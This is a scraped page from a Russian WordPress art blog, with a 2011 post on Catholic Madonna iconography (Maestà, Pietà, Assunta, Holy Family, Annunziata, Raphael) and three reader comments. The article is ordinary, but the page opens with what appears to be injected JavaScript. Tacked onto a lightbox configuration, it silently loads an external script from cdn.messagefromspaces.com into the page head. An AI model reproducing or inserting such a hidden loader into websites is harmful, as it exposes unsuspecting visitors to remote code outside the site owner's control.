, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Иконография Часть 3

Автор: Юлия | 25 Янв 2011

В эпоху Средневековья католическая иконография Богородицы тяготела к изображениям, представлявшим Мадонну как олицетворение райской, преображенной природы. И хотя на заре католического искусства образу Девы Марии были присущи воинственные черты, иконография ее изображений постепенно изменилась в сторону более трепетного, женственного образа.

Иконография изображения Богородицы в западноевропейском искусстве довольно обширна и разнопланова. Приведем лишь некоторые ее типы.

"Маэста" – взята итальянскими художниками из византийской православной иконографии (прототипом послужила "Одигитрия"). Мадонна с Младенцем на руках изображалась сидящей на троне в окружении святых и ангелов.

"Пьета" – Богородица оплакивает снятого с креста Спасителя.

"Ассунта" – рассказывает о вознесении Девы Марии после смерти на небо. Догмат Вознесения Богоматери представляет католическую точку зрения на православное Успение Богородицы.

"Святое Семейство" – изображение Девы Марии с супругом Иосифом и Младенцем Иисусом. Праздник Святого семейства отмечается католиками в следующее воскресенье после Рождества Христова.

"Непорочное Сердце" – Мадонна изображалась с сияющим сердцем в груди. Эта иконография также восходит к католическому Празднику Сердца Марии. Сердце Богородицы является символом милосердия, сострадания, любви к людям.

"Аннуциата" – изображение евангельской сцены Благовещения, в которой архангел Гавриил возвещает Деву Марию о будущем рождении Иисуса Христа.

Художники Ренессанса и Возрождения много работали над образом Богородицы, наделяя ее и античными, и традиционными чертами. Наиболее гармоничный стиль изображения Мадонны принадлежит кисти Рафаэля. В его знаменитых шедеврах образ Мадонны соединил в себе земное и небесное начала. Этот стиль прочно закрепился в католической культуре и просуществовал вплоть до современности.

А мы продолжим наше знакомство с иконографией уже очень скоро. Надеюсь, эта тема увлекла Вас не меньше, чем меня.

Темы: Изобразительное искусство, Икона, Школа искусства | Отзывов: 3 »

Отзывов: 3 на “Иконография Часть 3”

  1. Алексей пишет:
    27 Янв 2011 в 19:39

    Спасибо тебе Дмитрий, тема действительно очень увлекательная, искусство никогда не умрет!!!

  2. Дмитрий Алмазов пишет:
    27 Янв 2011 в 19:53

    В этом можно не сомневаться!

  3. Tweets that mention Иконография Часть 3 | Лаборатория Искусства -- Topsy.com пишет:
    28 Янв 2011 в 14:26

    [...] This post was mentioned on Twitter by Vasyl Lyahovskyy and Natalya Kiseleva, Madina. Madina said: RT @almazov82on Иконография Часть 3 | Лаборатория Искусства http://bit.ly/gqCyKX [...]

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress